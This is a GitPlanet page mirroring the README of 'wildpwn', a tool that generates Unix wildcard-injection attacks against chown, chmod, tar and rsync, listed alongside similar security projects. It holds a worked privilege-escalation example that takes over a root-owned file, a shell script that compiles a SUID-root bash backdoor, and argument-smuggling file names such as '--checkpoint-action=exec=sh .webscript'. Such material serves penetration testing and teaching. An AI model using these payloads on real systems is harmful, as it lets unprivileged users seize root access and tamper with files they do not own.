GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → localh0t → wildpwn

localh0t / wildpwn

Licence: GPL-3.0 license
unix wildcard attacks

Programming Languages

python
139335 projects - #7 most used programming language

Labels

securityunixinfosecroot-privilegesunix-shellsecurity-tools

Projects that are alternatives of or similar to wildpwn

TermGL
2D & 3D graphics engine in the terminal [C/C++]
Stars: ✭ 219 (+84.03%)
Mutual labels:  unix, unix-shell
dot-elvish
My configuration files for elvish - mirrored from GitLab
Stars: ✭ 43 (-63.87%)
Mutual labels:  unix, unix-shell
Malware-Sample-Sources
Malware Sample Sources
Stars: ✭ 214 (+79.83%)
Mutual labels:  infosec
S3Scan
Script to spider a website and find publicly open S3 buckets
Stars: ✭ 21 (-82.35%)
Mutual labels:  infosec
bsu
🎓Repository for university labs on FAMCS, BSU
Stars: ✭ 91 (-23.53%)
Mutual labels:  unix
bask
A runner and framework for command-centric Bash scripts.
Stars: ✭ 31 (-73.95%)
Mutual labels:  unix
Onyx
UNIX-like operating system written in C and C++
Stars: ✭ 52 (-56.3%)
Mutual labels:  unix
rustpad
Multi-threaded Padding Oracle attacks against any service. Written in Rust.
Stars: ✭ 75 (-36.97%)
Mutual labels:  infosec
MurMurHash
This little tool is to calculate a MurmurHash value of a favicon to hunt phishing websites on the Shodan platform.
Stars: ✭ 79 (-33.61%)
Mutual labels:  infosec
SuperLibrary
Information Security Library
Stars: ✭ 60 (-49.58%)
Mutual labels:  infosec
shod-old
hybrid (floating and tiling) tabbed window manager
Stars: ✭ 56 (-52.94%)
Mutual labels:  unix
Sistem-Programlama
System Programming Course notes
Stars: ✭ 32 (-73.11%)
Mutual labels:  unix
command-line-quick-reference
quick reference on command line tools and techniques for the people with limited time
Stars: ✭ 331 (+178.15%)
Mutual labels:  unix
dotfiles
🍁 dotfiles || plain text configuration files for my linux system
Stars: ✭ 53 (-55.46%)
Mutual labels:  unix
dummyDLL
Utility for hunting UAC bypasses or COM/DLL hijacks that alerts on the exported function that was consumed.
Stars: ✭ 35 (-70.59%)
Mutual labels:  infosec
chmod-stego
A PoC on passing data through UNIX file privilege bits (RWX Triplets)
Stars: ✭ 23 (-80.67%)
Mutual labels:  unix
standards-maintenance
This repository houses the interactions, consultations and work management to support the maintenance of baselined components of the Consumer Data Right API Standards and Information Security profile.
Stars: ✭ 32 (-73.11%)
Mutual labels:  infosec
polscan
Zero-setup SSH-based scanner with extensive visualizations for Debian server inventory, policy compliance and vulnerabilities
Stars: ✭ 57 (-52.1%)
Mutual labels:  infosec
pentest-reports
Collection of penetration test reports and pentest report templates. Published by the the best security companies in the world.
Stars: ✭ 111 (-6.72%)
Mutual labels:  infosec
Jiraffe
One stop place for exploiting Jira instances in your proximity
Stars: ✭ 157 (+31.93%)
Mutual labels:  infosec
View All Similar Projects ➔

First things first!

Read: https://www.exploit-db.com/papers/33930/


Basic usage

It goes something like this:

usage: wildpwn.py [-h] [--file FILE] payload folder

Tool to generate unix wildcard attacks

positional arguments:
  payload      Payload to use: (combined | tar | rsync)
  folder       Where to write the payloads

optional arguments:
  -h, --help   show this help message and exit
  --file FILE  Path to file for taking ownership / change permissions. Use it
               with combined attack only.

Payload types

  • combined: Uses the chown & chmod file reference tricks, described in section 4.1 and 4.2, combined in a single payload.
  • tar: Uses the Tar arbitrary command execution trick, described in section 4.3.
  • rsync: Uses the Rsync arbitrary command execution trick, described in section 4.4.

Usage example

$ ls -lh /tmp/very_secret_file
-rw-r--r-- 1 root root 2048 jun 28 21:37 /tmp/very_secret_file

$ ls -lh ./pwn_me/
drwxrwxrwx 2 root root 4,0K jun 28 21:38 .
[...]
-rw-rw-r-- 1 root root    1024 jun 28 21:38 secret_file_1
-rw-rw-r-- 1 root root    1024 jun 28 21:38 secret_file_2
[...]

$ python wildpwn.py --file /tmp/very_secret_file combined ./pwn_me/
[!] Selected payload: combined
[+] Done! Now wait for something like: chown uid:gid *  (or)  chmod [perms] * on ./pwn_me/. Good luck!

[...time passes / some cron gets executed...]

# chmod 000 * (for example)

[...back with the unprivileged user...]

$ ls -lha ./pwn_me/
[...]
-rwxrwxrwx 1 root root    1024 jun 28 21:38 secret_file_1
-rwxrwxrwx 1 root root    1024 jun 28 21:38 secret_file_2
[...]

$ ls -lha /tmp/very_secret_file
-rwxrwxrwx 1 root root 2048 jun 28 21:38 /tmp/very_secret_file

Bash scripts used on tar/rsync attacks

#!/bin/sh

# get current user uid / gid
CURR_UID="$(id -u)"
CURR_GID="$(id -g)"

# save file
cat > .cachefile.c << EOF
#include <stdio.h>
int main()
{
setuid($CURR_UID);
setgid($CURR_GID);
execl("/bin/bash", "-bash", NULL);
return 0;
}
EOF

# make folder where the payload will be saved
mkdir .cache
chmod 755 .cache

# compile & give SUID
gcc -w .cachefile.c -o .cache/.cachefile
chmod 4755 .cache/.cachefile

Clean up (tar)

# clean up
rm -rf ./'--checkpoint=1'
rm -rf ./'--checkpoint-action=exec=sh .webscript'
rm -rf .webscript
rm -rf .cachefile.c

Clean up (rsync)

# clean up
rm -rf ./'-e sh .syncscript'
rm -rf .syncscript
rm -rf .cachefile.c

Feel free to change them!

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].